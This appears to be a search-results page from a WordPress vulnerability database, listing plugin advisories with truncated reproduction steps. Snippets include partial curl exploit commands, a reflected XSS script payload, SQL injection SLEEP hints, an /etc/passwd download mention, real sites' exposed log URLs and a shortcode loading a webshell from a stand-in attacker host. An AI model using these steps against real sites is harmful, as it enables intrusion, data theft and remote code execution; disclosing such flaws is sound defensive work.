Lucene search
K
WpexploitRecent

4359 matches found

wpexploit
wpexploit
added 2023/12/11 12:0 a.m.518 views

Popup Builder < 4.2.3 - Unauthenticated Stored XSS

Description The plugin does not prevent simple visitors from updating existing popups, and injecting raw JavaScript in them, which could lead to Stored XSS attacks. 1 Create a popup using the plugin 2 Run the following curl command, switching $POPUPID with that popup's ID: curl --url...

6.1CVSS9AI score0.01999EPSS
Exploits4References1
wpexploit
wpexploit
added 2023/12/09 12:0 a.m.300 views

Download Manager < 3.2.83 - Unauthenticated Protected File Download Password Leak

Description The plugin does not protect file download's passwords, leaking it upon receiving an invalid one. 223 being the ID of a password protected download: curl -X POST --data 'wpdmID=223&dataType=json&execute=wpdmgetlink&action=wpdmajaxcall&password=123322'...

7.5CVSS6.8AI score0.02437EPSS
Exploits3
wpexploit
wpexploit
added 2023/12/08 12:0 a.m.143 views

Backup Migration Staging < 1.3.6 - Sensitive Data Exposure

Description The plugin stores in-progress backups information in easy to find, publicly-accessible files, which may allow attackers monitoring those to leak sensitive information from the site's backups. 1 Run a backup of the site 2 Notice the following files are all publicly available while the...

7.5CVSS9.2AI score0.00688EPSS
Exploits2References1
wpexploit
wpexploit
added 2023/12/08 12:0 a.m.153 views

PayHere Payment Gateway < 2.2.12 - Unauthenticated Log Data Disclosure

Description The plugin automatically creates publicly-accessible log files containing sensitive information when transactions occur. https://www.suppliment.lk/wp-content/uploads/payhere-logs/?SD https://www.medic.lk/wp-content/uploads/payhere-logs/?SD...

7.5CVSS6.4AI score0.00726EPSS
Exploits2
wpexploit
wpexploit
added 2023/12/08 12:0 a.m.336 views

Html5 Video Player < 2.5.19 - Subscriber+ Stored XSS

Description The plugin does not sanitise and escape some of its player settings, which combined with missing capability checks around the plugin could allow any authenticated users, such as low as subscribers to perform Stored Cross-Site Scripting attacks against high privilege users like admins...

5.4CVSS5.6AI score0.00527EPSS
Exploits2
wpexploit
wpexploit
added 2023/12/08 12:0 a.m.1221 views

Elementor < 3.18.2 - Contributor+ Arbitrary File Upload to RCE via Template Import

Description The plugin is vulnerable to Remote Code Execution via file upload via the template import functionality, allowing authenticated attackers, with contributor-level access and above, to upload files and execute code on the server. 1. Edit a post in Elementor. 2. Import a template folder...

9.9CVSS9.8AI score0.041EPSS
Exploits3References1
wpexploit
wpexploit
added 2023/12/07 12:0 a.m.168 views

ArtPlacer Widget < 2.20.7 - Editor+ SQLi

Description The plugin does not sanitize and escape the "id" parameter before submitting the query, leading to a SQLI exploitable by editors and above. Note: Due to the lack of CSRF check, the issue could also be exploited via a CSRF against a logged editor or above As an editor, open...

8.8CVSS6.7AI score0.00415EPSS
Exploits2
wpexploit
wpexploit
added 2023/12/07 12:0 a.m.163 views

WP Staging (Free < 3.1.3, Pro < 5.1.3) - Unauthenticated Backup Download

Description The plugin does not prevent visitors from leaking key information about ongoing backups processes, allowing unauthenticated attackers to download said backups later. The plugin creates temporary cache files when backing up sites, which are publicly accessible to anyone. Said cache fil...

7.5CVSS6.6AI score0.00782EPSS
Exploits2References1
wpexploit
wpexploit
added 2023/12/06 12:0 a.m.148 views

Royal Elementor Addons and Templates < 1.3.81 - Unauthenticated Arbitrary Post Read

Description The plugin does not ensure that users accessing posts via an AJAX action and REST endpoint, currently disabled in the plugin have the right to do so, allowing unauthenticated users to access arbitrary draft, private and password protected posts/pages content WooCommerce needs to be...

7.5CVSS7.1AI score0.0071EPSS
Exploits2
wpexploit
wpexploit
added 2023/12/05 12:0 a.m.438 views

Ecwid Ecommerce Shopping Cart < 6.12.5 - Arbitrary Plugin Settings Change via CSRF

Description The plugin does not have CSRF check in place when updating its settings, which could allow attackers to make a logged in admin change them via a CSRF attack. http://vulnerable-site.tld/wp-admin/admin-ajax.php?action=ecwidstorefrontsetpageslug&slug=hehehehe Besides, you can disable the...

4.3CVSS6.7AI score0.00217EPSS
Exploits2
wpexploit
wpexploit
added 2023/12/04 12:0 a.m.159 views

JSON Content Importer < 1.5.4 - Reflected XSS

Description The plugin does not sanitise and escape the tab parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin Make a logged in admin open:...

6.1CVSS6AI score0.0042EPSS
Exploits2
wpexploit
wpexploit
added 2023/12/04 12:0 a.m.305 views

Duplicator < 1.5.7.1; Duplicator Pro < 4.5.14.2 - Unauthenticated Sensitive Data Exposure

Description The plugin does not disallow listing the backups-dup-lite/tmp directory or the backups-dup-pro/tmp directory in the Pro version, which temporarily stores files containing sensitive data. When directory listing is enabled in the web server, this allows unauthenticated attackers to...

7.5CVSS8.8AI score0.30894EPSS
Exploits5References1
wpexploit
wpexploit
added 2023/12/01 12:0 a.m.139 views

Hotel Booking Lite < 4.8.5 - Unauthenticated Arbitrary File Download & Deletion

Description The plugin does not validate file paths provided via user input, as well as does not have proper CSRF and authorisation checks, allowing unauthenticated users to download and delete arbitrary files on the server To download /etc/passwd: curl...

9.8CVSS7.1AI score0.03313EPSS
Exploits2
wpexploit
wpexploit
added 2023/11/30 12:0 a.m.213 views

WP Sessions Time Monitoring Full Automatic < 1.0.9 - Unauthenticated SQL injection

Description The plugin does not sanitize the request URL or query parameters before using them in an SQL query, allowing unauthenticated attackers to extract sensitive data from the database via blind time based SQL injection techniques, or in some cases an error/union based technique. Blind time...

7.5CVSS8.2AI score0.02221EPSS
Exploits2
wpexploit
wpexploit
added 2023/11/30 12:0 a.m.157 views

Quiz Maker < 6.4.9.5 - Unauthenticated Email Address Disclosure

Description The plugin does not adequately authorize the aysquizauthorusersearch AJAX action, allowing an unauthenticated attacker to perform a search for users of the system, ultimately leaking user email addresses. import string import requests baseurl =...

5.3CVSS6.9AI score0.00565EPSS
Exploits2
wpexploit
wpexploit
added 2023/11/30 12:0 a.m.153 views

Quiz Maker < 6.4.9.5 - Reflected Cross-Site Scripting

Description The plugin does not escape generated URLs before outputting them in attributes, leading to Reflected Cross-Site Scripting Visit the following URL: https://example.com/wp-admin/admin.php?page=quiz-maker-questions&fake%22%3E%3Cscript%3Ealert/xss/%3C/script%3E=something...

6.1CVSS6.6AI score0.0042EPSS
Exploits2
wpexploit
wpexploit
added 2023/11/29 12:0 a.m.165 views

rtMedia for WordPress, BuddyPress and bbPress < 4.6.16 - Subscriber+ RCE

Description The plugin does not validate files to be uploaded, which could allow attackers with a low-privilege account e.g. subscribers to upload arbitrary files such as PHP on the server If plugin JSON API is enabled, any logged-in user may execute arbitrary code by uploading a PHP file. After...

8.8CVSS6.9AI score0.00816EPSS
Exploits2
wpexploit
wpexploit
added 2023/11/29 12:0 a.m.148 views

BestWebSoft's Like & Share < 2.74 - Unauthenticated Password Protected Post Read

Description The plugin discloses the content of password protected posts to unauthenticated users via a meta tag In the web browser, view the source of any password protected post and check the og:description meta tag...

7.5CVSS7AI score0.00456EPSS
Exploits2
wpexploit
wpexploit
added 2023/11/29 12:0 a.m.208 views

rtMedia for WordPress, BuddyPress and bbPress < 4.6.16 - Admin+ RCE

Description The plugin loads the contents of the import file in an unsafe manner, leading to remote code execution by privileged users. 1. As an admin, visit rtMedia Settings Export/Import. 2. Click the "Browse File" button beside "Import rtMedia Settings". 3. Upload a file with the extension .js...

7.2CVSS7.6AI score0.01331EPSS
Exploits2
wpexploit
wpexploit
added 2023/11/28 12:0 a.m.170 views

WP Mail Log < 1.1.3 – Incorrect Authorization in REST API Endpoints

Description The plugin does not correctly authorize its REST API endpoints, allowing users with the Contributor role to view and delete data that should only be accessible to Admin users. The following actions may be taken by a Contributor user: --- /wmllogs - Information leak Execute the followi...

7.6CVSS7.5AI score0.00499EPSS
Exploits2
wpexploit
wpexploit
added 2023/11/28 12:0 a.m.124 views

WP Mail Log < 1.1.3 – Contributor+ LFI in wml_logs/send_mail endpoint

Description The plugin does not properly validate file path parameters when attaching files to emails, leading to local file inclusion, and allowing an attacker to leak the contents of arbitrary files. Run the following within any page on the site, ensuring that the id parameter is set to a valid...

6.5CVSS6.6AI score0.00707EPSS
Exploits2
wpexploit
wpexploit
added 2023/11/28 12:0 a.m.165 views

WP Mail Log < 1.1.3 – Contributor+ SQL Injection in wml_logs/send_mail endpoint

Description The plugin does not properly sanitise and escape a parameter before using it in a SQL statement, leading to a SQL injection exploitable by users with a role as low as Contributor. Run the following within any page on the site. Notice that the request is delayed by the SLEEP call in th...

8.8CVSS7.4AI score0.10826EPSS
Exploits2
wpexploit
wpexploit
added 2023/11/28 12:0 a.m.121 views

WP Mail Log < 1.1.3 – Contributor+ SQL Injection in wml_logs endpoint

Description The plugin does not properly sanitise and escape a parameter before using it in a SQL statement, leading to a SQL injection exploitable by users with a role as low as Contributor. Run the following within a block editor page. Notice that the request is delayed by the SLEEP call in the...

8.8CVSS7.4AI score0.00721EPSS
Exploits2
wpexploit
wpexploit
added 2023/11/28 12:0 a.m.144 views

WP Crowdfunding < 2.1.8 - Admin+ Stored XSS

Description The plugin does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfilteredhtml capability is disallowed for example in multisite setup 1. Add a campaign and for the reward...

4.8CVSS5.7AI score0.00451EPSS
Exploits2
wpexploit
wpexploit
added 2023/11/28 12:0 a.m.195 views

BSK Forms Blacklist < 3.7 - Admin+ Stored Cross-Site Scripting

Description The plugin does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfilteredhtml capability is disallowed for example in multisite setup. 1. In the plugin settings ex:...

4.8CVSS7.3AI score0.00379EPSS
Exploits2
wpexploit
wpexploit
added 2023/11/28 12:0 a.m.394 views

WP Mail Log < 1.1.3 – Contributor+ Arbitrary File Upload to RCE

Description The plugin does not properly validate file extensions uploading files to attach to emails, allowing attackers to upload PHP files, leading to remote code execution. Run the following JS code in any page on the server, setting the id variable to a valid ID of a log entry on the server...

8.8CVSS9.2AI score0.01096EPSS
Exploits2
wpexploit
wpexploit
added 2023/11/27 12:0 a.m.134 views

Swift Performance Lite <= 2.3.6.14 - Unauthenticated Configuration Export

Description The plugin does not prevent users from exporting the plugin's settings, which may include sensitive information such as Cloudflare API tokens. curl --url 'http://vulnerable-site.tld/wp-admin/admin-post.php?luv-action=export'...

4.3CVSS8.6AI score0.00916EPSS
Exploits3
wpexploit
wpexploit
added 2023/11/27 12:0 a.m.166 views

so-widgets-bundle < 1.51.0 - Admin+ Local File Inclusion

Description The plugin does not validate user input before using it to generate paths passed to include function/s, allowing users with the administrator role to perform LFI attacks in the context of Multisite WordPress sites. 1. Create a multi-site wordpress setup, i.e. using docker-containers,...

7.2CVSS8.7AI score0.01034EPSS
Exploits2
wpexploit
wpexploit
added 2023/11/24 12:0 a.m.144 views

Theme My Login 2FA < 1.2 - Lack of Rate Limiting

Description The plugin does not rate limit 2FA validation attempts, which may allow an attacker to brute-force all possibilities, which shouldn't be too long, as the 2FA codes are 6 digits. https://packetstormsecurity.com/2309-exploits/wpmylogin-bruteforce.txt...

9.8CVSS7.2AI score0.00892EPSS
Exploits2References1
wpexploit
wpexploit
added 2023/11/24 12:0 a.m.204 views

Vrm 360 3D Model Viewer <= 1.2.1 - Contributor+ Arbitrary File Upload Leading to RCE

Description The plugin is vulnerable to arbitrary file upload due to insufficient checks in a plugin shortcode. 1. Host a webserver with a shell named webshell.zip.php 2. As a contributor, add the shortcode: vrm360 canvasname=s1 modelurl=http://ATTACKERHOST/webshell.zip.php aspectratio=1.8...

8.8CVSS7.4AI score0.00985EPSS
Exploits2
wpexploit
wpexploit
added 2023/11/23 12:0 a.m.184 views

Slider - Ultimate Responsive Image Slider < 3.5.12 - Subscriber+ Arbitrary Post Access

Description The plugin does not ensure that posts to be accessed via an AJAX action are slides and can be viewed by the user making the request, allowing any authenticated users, such as subscriber to access the content arbitrary post such as private, draft and password protected Run the below...

6.5CVSS6.9AI score0.00665EPSS
Exploits2
wpexploit
wpexploit
added 2023/11/23 12:0 a.m.227 views

The Events Calendar < 6.2.8.1 - Unauthenticated Arbitrary Password Protected Post Read

Description The plugin discloses the content of password protected posts to unauthenticated users via a crafted request Append "?view=single-event" to a password protected post, then view the source of the page and find the post content disclosed in Example:...

7.5CVSS6.9AI score0.00776EPSS
Exploits2
wpexploit
wpexploit
added 2023/11/23 12:0 a.m.167 views

SmartCrawl WordPress SEO checker < 3.8.3 - Unauthenticated Password Protected Post Disclosure

Description The plugin does not prevent unauthorised users from accessing password-protected posts' content. As unauthenticated, view the source via the web browser of any password protected post and find The content of the post will be disclosed in the meta and script tags after this, example:...

7.5CVSS6.8AI score0.00756EPSS
Exploits2
wpexploit
wpexploit
added 2023/11/21 12:0 a.m.161 views

WP All Export (Free < 1.4.0, Pro < 1.8.6) - Admin+ RCE

Description The plugin does not validate and sanitise the wpquery parameter which allows an attacker to run arbitrary command on the remote server 1. Go to "All Export" "New Export" 2. Select "WP Query Results" as the export type 3. Enter the payload phpinfo for the query. 4. Click customize and...

7.2CVSS9.7AI score0.01151EPSS
Exploits2
wpexploit
wpexploit
added 2023/11/21 12:0 a.m.213 views

Quttera Web Malware Scanner < 3.4.2.1 - Directory Listing to Sensitive Data Exposure

Description The plugin doesn't restrict access to detailed scan logs, which allows a malicious actor to discover local paths and portions of the site's code http://yoursite/wordpress/wp-content/plugins/quttera-web-malware-scanner/runtime.log...

5.3CVSS9.3AI score0.18697EPSS
Exploits2References1
wpexploit
wpexploit
added 2023/11/21 12:0 a.m.183 views

Product Catalog Enquiry for WooCommerce < 5.0.3 - Unauthenticated Stored XSS via Arbitrary Setting Update

Description The plugin does not properly authorize settings updates or escape settings values, leading to stored XSS by unauthenticated users. 1 Make sure the plugin is configured with the "Catalog Mode" activated. 2 Launch the following from your browser's console:...

6.1CVSS6AI score0.00531EPSS
Exploits2
wpexploit
wpexploit
added 2023/11/21 12:0 a.m.155 views

Autocomplete Location field Contact Form 7 < 3.0 - Admin+ Store Cross-Site Scripting

Description The plugin does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfilteredhtml capability is disallowed for example in multisite setup 1. Go to "Contact Google Place API" 2...

4.8CVSS7.9AI score0.00442EPSS
Exploits2
wpexploit
wpexploit
added 2023/11/21 12:0 a.m.162 views

WP All Export (Free < 1.4.1, Pro < 1.8.6) - Remote Code Execution via CSRF

Description The plugin does not check nonce tokens early enough in the request lifecycle, allowing attackers to make logged in users perform unwanted actions leading to remote code execution. Submit the following form as a Super Admin notice that it does not contain a nonce. Despite the error,...

8.8CVSS9.7AI score0.0055EPSS
Exploits2
wpexploit
wpexploit
added 2023/11/21 12:0 a.m.171 views

Quttera Web Malware Scanner < 3.4.2.1 - Admin+ Path Traversal

Description IThe plugin does not validate user input used in a path, which could allow users with an admin role to perform path traversal attacks 1 Go to http://yoursite/wordpress/wp-admin/admin.php?page=qutterawmscannerint 2 Click "Scan Now" 3 Click "Detected Threats" 4 Navigate to some Suspicio...

7.2CVSS9.5AI score0.01061EPSS
Exploits2References1
wpexploit
wpexploit
added 2023/11/21 12:0 a.m.171 views

WP All Export (Free < 1.4.1, Pro < 1.8.6) - Author+ PHAR Deserialization via CSRF

Description The plugin does not check nonce tokens early enough in the request lifecycle, allowing attackers with the ability to upload files to make logged in users perform unwanted actions leading to PHAR deserialization, which may lead to remote code execution. 1. Ensure your WordPress...

8.8CVSS9.7AI score0.0055EPSS
Exploits2
wpexploit
wpexploit
added 2023/11/20 12:0 a.m.151 views

EmbedPress < 3.9.2 - Reflected XSS

Description The plugin does not sanitise and escape user input before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin Make a logged in admin open a page containing the HTML code below " / " /...

6.1CVSS6AI score0.0062EPSS
Exploits2
wpexploit
wpexploit
added 2023/11/20 12:0 a.m.172 views

File Manager < 6.3 - Admin+ Arbitrary OS File/Folder Access + Path Traversal

Description The plugin does not restrict the file managers root directory, allowing an administrator to set a root outside of the WordPress root directory, giving access to system files and directories even in a multisite setup, where site administrators should not be allowed to modify the sites...

6.5CVSS9.4AI score0.0085EPSS
Exploits2References1
wpexploit
wpexploit
added 2023/11/20 12:0 a.m.189 views

EazyDocs < 2.3.4 - Subscriber + SQLi

Description The plugin does not properly sanitize and escape "data" parameter before using it in an SQL statement via an AJAX action, which could allow any authenticated users, such as subscribers, to perform SQL Injection attacks. 1. Create a document then create some sections in the document 2...

8.8CVSS7.6AI score0.00853EPSS
Exploits2
wpexploit
wpexploit
added 2023/11/20 12:0 a.m.174 views

EmbedPress < 3.9.2 - Reflected XSS

Description The plugin does not sanitise and escape a parameter before outputting it back in the page containing a specific content, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin On a post/page where containing the following output whic...

6.1CVSS6.5AI score0.00471EPSS
Exploits2
wpexploit
wpexploit
added 2023/11/17 12:0 a.m.189 views

LearnPress < 4.2.5.5 - Reflected Cross-Site Scripting

Description The plugin does not sanitise and escape user input before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin. Make a logged in admin open v 4.2.5.2 -...

6.1CVSS6AI score0.00916EPSS
Exploits2
wpexploit
wpexploit
added 2023/11/14 12:0 a.m.155 views

WP Not Login Hide <= 1.0 - Admin+ Stored XSS

Description The plugin does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfilteredhtml capability is disallowed for example in multisite setup 1. Visit the "WPNLH" interface availab...

4.8CVSS5.6AI score0.00425EPSS
Exploits2
wpexploit
wpexploit
added 2023/11/14 12:0 a.m.152 views

Contact Form Email < 1.3.44 - Editor+ Stored Cross-Site Scripting

Description The plugin does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfilteredhtml capability is disallowed for example in multisite setup 1. Create a form and navigate to 'Edit...

6.1CVSS6AI score0.00455EPSS
Exploits2
wpexploit
wpexploit
added 2023/11/13 12:0 a.m.157 views

Popup box < 3.8.6 - Admin+ Stored XSS in Popup Settings

Description The plugin does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfilteredhtml capability is disallowed for example in multisite setup 1. Add a new Popup 2. In the "Popups...

4.8CVSS6AI score0.0045EPSS
Exploits2
wpexploit
wpexploit
added 2023/11/13 12:0 a.m.141 views

Easy Newsletter Signups <= 1.0.4 - Admin+ SQLi

Description The plugin does not properly sanitise and escape a parameter before using it in a SQL statement, leading to a SQL injection exploitable by high privilege users such as admin 1. From the "Easy Newsletter Signups", select an email address and then click "Export to CSV" 2. Intercept the...

7.2CVSS7.9AI score0.00958EPSS
Exploits2
wpexploit
wpexploit
added 2023/11/13 12:0 a.m.140 views

Frontend File Manager < 22.7 - Editor+ Arbitrary File Download

Description The plugin has a vulnerability that allows an Editor+ user to bypass the file download logic and download files such as wp-config.php 1 Create new post with this shortcode - ffmwp 2 Go to new post and upload any file 3 After that go to main page of plugin for users...

6.5CVSS9.7AI score0.01048EPSS
Exploits2References1
Total number of security vulnerabilities4359